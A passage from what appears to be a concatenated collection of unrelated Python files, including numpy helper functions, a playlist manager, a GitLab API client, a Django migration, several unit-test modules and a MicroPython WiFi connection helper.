Array that should be tested for monotonicity
increasing : bool, default: True
        Test if the array is monotonically increasing, otherwise test if the
        array is monotonically decreasing.
"""
a = np.asarray(a) # ensure a is array-like
if a.ndim > 1:
raise ValueError("not supported for multi-dimensonal arrays")
if len(a) <= 1:
return True
if increasing:
return np.all(a[1:] >= a[:-1], axis=0)
return np.all(a[1:] <= a[:-1], axis=0)
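# Illustrative behaviour:
#   is_monotonic([1, 2, 2, 3])                 -> True
#   is_monotonic([3, 2, 1], increasing=False)  -> True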
##########################################################################
## Numeric Computations
##########################################################################
#From here: http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
def div_safe( numerator, denominator ):
"""
Ufunc-extension that returns 0 instead of nan when dividing numpy arrays
Parameters
----------
numerator: array-like
    denominator: scalar or array-like by which the numerator can be validly divided
returns a numpy array
example: div_safe( [-1, 0, 1], 0 ) == [0, 0, 0]
"""
#First handle scalars
if np.isscalar(numerator):
raise ValueError("div_safe should only be used with an array-like numerator")
#Then numpy arrays
try:
with np.errstate(divide='ignore', invalid='ignore'):
result = np.true_divide( numerator, denominator )
result[ ~ np.isfinite( result )] = 0 # -inf inf NaN
return result
except ValueError as e:
raise e
def prop_to_size(vals, mi=0.0, ma=5.0, power=0.5, log=False):
"""
Converts an array of property values (e.g. a metric or score) to values
that are more useful for marker sizes, line widths, or other visual
sizes. The new sizes are computed as:
    y = mi + (ma - mi)\left(\frac{x_i - \min(x)}{\max(x) - \min(x)}\right)^{power}
If ``log=True``, the natural logarithm of the property values is used instead.
Parameters
----------
    vals : array-like, 1D
        An array of values of the property to scale into the size range.
mi : float, default: 0.0
The size to assign the smallest property (minimum size value).
ma : float, default: 5.0
The size to assign the largest property (maximum size value).
power : float, default: 0.5
Used to control how rapidly the size increases from smallest to largest.
log : bool, default: False
Use the natural logarithm to compute the property sizes
Returns
-------
sizes : array, 1D
The new size values, in the same shape as the input prop array
"""
# ensure that prop is an array
vals = np.asarray(vals)
# apply natural log if specified
if log:
vals = np.log(vals)
# avoid division by zero error
delta = vals.max() - vals.min()
if delta == 0.0:
delta = 1.0
return mi + (ma-mi) * ((vals -vals.min()) / delta) ** power
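# Illustrative example (arbitrary values):
#   prop_to_size([1, 2, 3, 4], mi=0.0, ma=5.0, power=0.5)
#   -> array([0.  , 2.887, 4.082, 5.  ])  (approximately)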
##########################################################################
## String Computations
##########################################################################
def slugify(text):
"""
Returns a slug of given text, normalizing unicode data for file-safe
strings. Used for deciding where to write images to disk.
Parameters
----------
text : string
The string to slugify
Returns
-------
slug : string
A normalized slug representation of the text
.. seealso:: http://yashchandra.com/2014/05/08/how-to-generate-clean-url-or-a-slug-in-python/
"""
slug = re.sub(r'[^\w]+', ' ', text)
slug = "-".join(slug.lower().strip().split())
return slug
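# Illustrative example:
#   slugify("ROC Curve (test set)")  ->  "roc-curve-test-set"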
| python |
import os
import random
class Playlist:
# maintains individual playlist
def __init__(self, path):
self.path = path
self.clips = []
n = os.path.basename(self.path).split(".")[:-1]
self.name = ".".join(n)
self.desc = ""
def load(self):
# each line has the format: "card_no, clip_name"
# line starting with a hash (#) is part of the description
with open(self.path) as pl:
for line in pl:
line = line.strip()
if line.startswith("#"):
self.desc += line.strip('#')
continue
if line == "":
continue
if "," in line:
line = line.split(",")
idx = line[0].strip()
cl = line[1].strip()
self.clips.append((idx, cl))
else:
print("Unknown line format in {}".format(self.path))
def delete(self):
os.remove(self.path)
def rename(self, name):
new = os.path.join(os.path.dirname(self.path), name)
os.rename(self.path, new)
self.path = new
n = name.split(".")[:-1]
self.name = ".".join(n)
def save(self):
with open(self.path, 'w+') as pl:
desc = self.desc.replace("\n", "\n#")
pl.write("#{}\n\n".format(desc))
for item in self.clips:
idx, cl = item
pl.write("{}, {}\n".format(idx, cl))
def addClip(self, idx, clip):
self.clips.append((idx, clip))
def removeClipAt(self, idx):
# remove clip at the specified position of the clip list
del self.clips[idx-1]
def removeClip(self, cardid, clipname):
# remove clip using card no and clip name
try:
idx = self.clips.index((cardid, clipname))
except ValueError:
# this shouldn't happen, perhaps we should
# raise a warning?
return
        else:
            del self.clips[idx]
def shuffle(self):
random.shuffle(self.clips)
class PlaylistContainer:
# maintains all the playlists
def __init__(self, directory=None):
self.listdir = directory
self.playlist_extension = ".pl"
self.lists = []
def load(self, directory=None):
if directory:
self.listdir = directory
if self.listdir is None:
raise ValueError("Playlist directory is not set.")
if not os.path.isdir(self.listdir):
os.mkdir(self.listdir)
for f in os.listdir(self.listdir):
if f.endswith(self.playlist_extension):
hnd = Playlist(os.path.join(self.listdir, f))
hnd.load()
self.lists.append(hnd)
def getIdByName(self, name):
for i, l in enumerate(self.lists):
if name == l.name:
return i
return None
def getIdByPath(self, path):
for i, l in enumerate(self.lists):
if path == l.path:
return i
return None
def create(self, name):
if not name.endswith(self.playlist_extension):
name += self.playlist_extension
hnd = Playlist(os.path.join(self.listdir, name))
hnd.save()
self.lists.append(hnd)
return hnd
def rename(self, playlistid, name):
if not name.endswith(self.playlist_extension):
name += self.playlist_extension
self.lists[playlistid].rename(name)
def addClip(self, playlistid, cardid, clipname):
self.lists[playlistid].addClip(cardid, clipname)
def name(self, playlistid):
return self.lists[playlistid].name
def getDesc(self, playlistid):
return self.lists[playlistid].desc
def setDesc(self, playlistid, d):
self.lists[playlistid].desc = d
self.lists[playlistid].save()
def clips(self, playlistid):
return self.lists[playlistid].clips
def save(self, playlistid=None):
# if no playlist id is given, save all
if playlistid is None:
for l in self.lists:
l.save()
else:
self.lists[playlistid].save()
def removeClip(self, playlistid, cardid, name):
self.lists[playlistid].removeClip(cardid, name)
self.save(playlistid)
def remove(self, playlistid):
self.lists[playlistid].delete()
del self.lists[playlistid]
def count(self, playlistid=None):
# if playlist id is given, return clips count of it
# if no playlist id is given, return playlists count
if playlistid is None:
return len(self.lists)
else:
return len(self.lists[playlistid].clips)
def updateOrder(self, playlistid, newlist):
# sanity check
if len(newlist) != self.count(playlistid):
print("Playlist UO: length mismatch.")
return False
for newitem in newlist:
if newitem not in self.lists[playlistid].clips:
print("Playlist UO: {} not in {}".format(newitem, self.name(playlistid)))
return False
self.lists[playlistid].clips = newlist
self.save(playlistid)
return True
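# Usage sketch (assumed directory name "playlists"; illustrative only):
#   container = PlaylistContainer("playlists")
#   container.load()
#   pl = container.create("favourites")          # creates playlists/favourites.pl
#   pid = container.getIdByPath(pl.path)
#   container.addClip(pid, "3", "sunrise_clip")  # card no, clip name
#   container.save(pid)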
| python |
# -*- coding: utf-8 -*-
# Copyright (C) SME Virtual Network contributors. All rights reserved.
# See LICENSE in the project root for license information.
| python |
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 6 14:07:32 2020
"""
from netCDF4 import Dataset
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
data = Dataset(r"C:\Users\Jiacheng Li\Desktop\Study\University of Birmingham Relevant\Final Year Project\NetCDF_Handling\NetCDF_data\1980.nc", "r")
lats = data.variables["lat"][:]
lons = data.variables["lon"][:]
time = data.variables["time"][:]
tave = data.variables["tave"][:]
mp = Basemap(projection = "merc",
llcrnrlon = 65.8,
llcrnrlat = -2,
urcrnrlon = 145.37,
urcrnrlat = 38.78,
resolution = "i")
lon, lat = np.meshgrid(lons, lats)
x, y = mp(lon, lat)
colorMap = mp.pcolor(x, y, np.squeeze(tave[0,:,:]), cmap = "rainbow")
mp.drawcoastlines()
mp.drawstates()
mp.drawcountries()
char = mp.colorbar(colorMap, location = "right", pad = "10%")
plt.title("Average Temparature on 01-01-1980")
plt.show()
| python |
from __future__ import absolute_import
from requests.exceptions import HTTPError
from six.moves.urllib.parse import quote
from sentry.http import build_session
from sentry_plugins.exceptions import ApiError
class GitLabClient(object):
def __init__(self, url, token):
self.url = url
self.token = token
def request(self, method, path, data=None, params=None):
headers = {
'Private-Token': self.token,
}
session = build_session()
try:
resp = getattr(session, method.lower())(
url='{}/api/v3/{}'.format(self.url, path.lstrip('/')),
headers=headers,
json=data,
params=params,
allow_redirects=False,
)
resp.raise_for_status()
except HTTPError as e:
raise ApiError.from_response(e.response)
return resp.json()
def auth(self):
return self.request('GET', '/user')
def get_project(self, repo):
return self.request('GET', '/projects/{}'.format(quote(repo, safe='')))
def get_issue(self, repo, issue_id):
try:
return self.request(
'GET',
'/projects/{}/issues'.format(
quote(repo, safe=''),
),
params={
# XXX(dcramer): this is an undocumented API
'iid': issue_id,
}
)[0]
except IndexError:
raise ApiError('Issue not found with ID', 404)
def create_issue(self, repo, data):
return self.request(
'POST',
'/projects/{}/issues'.format(quote(repo, safe='')),
data=data,
)
def create_note(self, repo, global_issue_id, data):
return self.request(
'POST',
'/projects/{}/issues/{}/notes'.format(
quote(repo, safe=''),
global_issue_id,
),
data=data,
)
def list_project_members(self, repo):
return self.request(
'GET',
'/projects/{}/members'.format(quote(repo, safe='')),
)
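# Usage sketch (hypothetical URL and token; only methods defined above are used):
#   client = GitLabClient("https://gitlab.example.com", "private-token")
#   client.auth()                                    # GET /user
#   client.get_project("group/project")              # GET /projects/group%2Fproject
#   client.create_issue("group/project", {"title": "Bug report"})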
| python |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-06 04:34
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
replaces = [(b'coding', '0001_initial'), (b'coding', '0002_auto_20160506_0424'), (b'coding', '0003_auto_20160506_0427')]
initial = True
dependencies = [
('main', '0001_squashed_0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Assignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField(blank=True, null=True)),
('assigned_comments', models.ManyToManyField(blank=True, to=b'main.Comment')),
('assigned_submissions', models.ManyToManyField(blank=True, to=b'main.Submission')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Code',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField(blank=True, null=True)),
('css_class', models.CharField(blank=True, max_length=64, null=True)),
('key', models.CharField(blank=True, max_length=1, null=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='code_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CodeScheme',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('name', models.CharField(max_length=64)),
('description', models.TextField()),
('mutually_exclusive', models.BooleanField(default=False)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CommentCodeInstance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('assignment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='coding.Assignment')),
('code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.Code')),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Comment')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SubmissionCodeInstance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('assignment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='coding.Assignment')),
('code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.Code')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_modified_by', to=settings.AUTH_USER_MODEL)),
('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Submission')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='code',
name='scheme',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.CodeScheme'),
),
migrations.AddField(
model_name='assignment',
name='code_schemes',
field=models.ManyToManyField(to=b'coding.CodeScheme'),
),
migrations.AddField(
model_name='assignment',
name='coder',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='deleted_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_deleted_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_modified_by', to=settings.AUTH_USER_MODEL),
),
]
| python |
import json
from nebulo.sql.reflection.function import reflect_functions
from sqlalchemy.dialects.postgresql import base as pg_base
CREATE_FUNCTION = """
create table account(
id int primary key,
name text
);
insert into account (id, name)
values (1, 'oli');
create function get_account(id int)
returns account
as $$
select (1, 'oli')::account;
$$ language sql;
"""
def test_reflect_function_returning_row(engine, session):
session.execute(CREATE_FUNCTION)
session.commit()
functions = reflect_functions(engine, schema="public", type_map=pg_base.ischema_names)
get_account = functions[0]
res = session.execute(get_account.to_executable([1])).first()
print(res)
# psycopg2 does not know how to deserialize row results
assert res == ("(1,oli)",)
def test_integration_function(client_builder):
client = client_builder(CREATE_FUNCTION)
query = """
mutation {
getAccount(input: {id: 1, clientMutationId: "abcdef"}) {
cmi: clientMutationId
out: result {
nodeId
id
}
}
}
"""
with client:
resp = client.post("/", json={"query": query})
result = json.loads(resp.text)
print(result)
assert resp.status_code == 200
assert result["errors"] == []
assert result["data"]["getAccount"]["out"]["id"] == 1
assert result["data"]["getAccount"]["out"]["nodeId"] is not None
assert result["data"]["getAccount"]["cmi"] == "abcdef"
| python |
# code modified from https://stackoverflow.com/questions/38401099/how-to-count-one-specific-word-in-python/38401167
import re
filename = input('Enter file:')  # type the path to any .txt file here
# for example, you can try the file in this folder: text_diamond.txt
handle = open(filename, 'r')
counts = dict()
for word in handle.read().split():
if word not in counts:
counts[word] = 1
else:
counts[word] += 1
print(counts)
# print only the count for my_word instead of iterating over entire dictionary
#my_word = "Shine"
# print(my_word, counts[my_word])
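# A shorter equivalent using the standard library (illustrative):
# from collections import Counter
# with open(filename, 'r') as fh:
#     print(Counter(fh.read().split()))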
| python |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='store-home-page'),
path('login/', views.login, name='login-page'),
path('signup/', views.signup, name='signup-page'),
]
| python |
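# Reads N integers and prints the smallest value ("Menor valor") and its zero-based position ("Posicao").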
N = int(input())
X = list(map(int,input().split()))
menor = X[0]
pos = 0
for k in range(1,N):
if X[k] < menor:
menor = X[k]
pos = k
print("Menor valor: %d" % (menor))
print("Posicao: %d" % (pos))
| python |
"""
Utilities Tests
---------------
"""
from poli_sci_kit import utils
def test_normalize():
assert sum(utils.normalize([1, 2, 3, 4, 5])) == 1.0
def test_gen_list_of_lists():
test_list = [0, 1, 2, 3, 4, 5, 6, 7, 8]
assert utils.gen_list_of_lists(
original_list=test_list, new_structure=[3, 3, 3]
) == [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
def test_gen_faction_groups():
test_list = ["a", "b", "c", "d", "e", "f"]
assert utils.gen_faction_groups(
original_list=test_list, factions_indexes=[[0, 1, 5], [2, 3, 4]]
) == [["a", "b", "f"], ["c", "d", "e",]]
def test_semiscirled_parl_plot(allocations):
assert list(
utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=False,
)["row"]
) == [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert list(
utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=False,
)["row_position"]
) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
test_df = utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=True,
)
assert test_df["x_loc"][len(test_df) - 1] == 0
assert test_df["y_loc"][len(test_df) - 1] == 0
def test_rectangle_parl_plot(allocations):
assert list(
utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)["row"]
) == [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3]
assert list(
utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)["row_position"]
) == [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4]
test_df = utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=True,
)
assert test_df["x_loc"][len(test_df) - 1] == 0
assert test_df["y_loc"][len(test_df) - 1] == 4
def test_swap_parl_allocations(allocations):
test_df = utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)
test_swap_df = test_df.copy()
utils.swap_parl_allocations(df=test_swap_df, row_0=0, pos_0=0, row_1=0, pos_1=1)
assert test_df["group"][0] == test_swap_df["group"][1]
def test_hex_to_rgb():
assert utils.hex_to_rgb("#ffffff").get_value_tuple() == (1.0, 1.0, 1.0)
def test_rgb_to_hex():
assert utils.rgb_to_hex((1.0, 1.0, 1.0)) == "#ffffff"
def test_scale_saturation():
assert utils.scale_saturation((1, 1, 1), 0.95) == (0.95, 0.95, 0.95)
| python |
from tark import constants
class DBSettings(object):
def __init__(self,
db_type=constants.DEFAULT_DB_TYPE,
db_name=constants.DEFAULT_DB_NAME,
db_user=constants.DEFAULT_DB_USER,
db_password=constants.DEFAULT_DB_PASSWORD,
db_node=constants.DEFAULT_DB_NODE,
**kwargs):
self.db_type = db_type
self.db_name = db_name
# db specific config parameters
self.db_user = db_user
self.db_password = db_password
self.db_node = db_node
self.db_configuration = dict()
if self.db_user is not None:
self.db_configuration["user"] = self.db_user
if self.db_password is not None:
self.db_configuration["password"] = self.db_password
if self.db_node is not None:
self.db_configuration["host"] = self.db_node
self.extra_config = dict(**kwargs)
self.db_configuration.update(**self.extra_config)
def get_settings(self):
return dict(db_type=self.db_type,
db_name=self.db_name,
db_user=self.db_user,
db_password=self.db_password,
db_node=self.db_node,
                    **self.extra_config)
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (C) 2011 Alan Franzoni. APL 2.0 licensed.
from unittest import TestCase
from abc import abstractmethod
from pydenji.ducktypes.function_copy import copy_raw_func_only, fully_copy_func
@abstractmethod
def example_func(a, b, c=1):
return 1
class AbstractTestFunctionCopy(object):
def test_function_wrapper_preserves_function_arg_count(self):
wrapped = self.copy_func(example_func)
self.assertEquals(3, wrapped.func_code.co_argcount)
def test_function_wrapper_preserves_function_return_value(self):
wrapped = self.copy_func(example_func)
self.assertEquals(1, wrapped(1,2))
def test_wrapped_func_is_actually_a_copy(self):
wrapped = self.copy_func(example_func)
wrapped.someattribute = 3
self.assertFalse(getattr(example_func, "someattribute", False))
class TestRaw(AbstractTestFunctionCopy, TestCase):
def setUp(self):
self.copy_func = copy_raw_func_only
def test_wrapped_function_is_never_abstract(self):
wrapped = self.copy_func(example_func)
self.assertFalse(getattr(wrapped, "__isabstractmethod__", False))
class TestCopyFuncFully(AbstractTestFunctionCopy, TestCase):
def setUp(self):
self.copy_func = fully_copy_func
def test_wrapped_function_abstract_attributes_are_copied(self):
wrapped = self.copy_func(example_func)
self.assertTrue(wrapped.__isabstractmethod__)
| python |
# Standard utils file
# Developed by Anodev Development (OPHoperHPO) (https://github.com/OPHoperHPO)
import time
import network
def wifi_connect(SSID, PASSWORD):
"""Connects to wifi."""
sta_if = network.WLAN(network.STA_IF)
if not sta_if.isconnected():
print('Connecting to network...')
sta_if.active(True)
sta_if.connect(SSID, PASSWORD)
timer = 30
while not sta_if.isconnected():
            if timer == 0 and not sta_if.isconnected():
return False
time.sleep(1)
timer -= 1
print('Network config:', sta_if.ifconfig())
return sta_if
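# Usage sketch (assumed credentials; illustrative only):
#   sta = wifi_connect("MySSID", "MyPassword")
#   if not sta:
#       print("WiFi connection failed after 30 seconds")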
| python |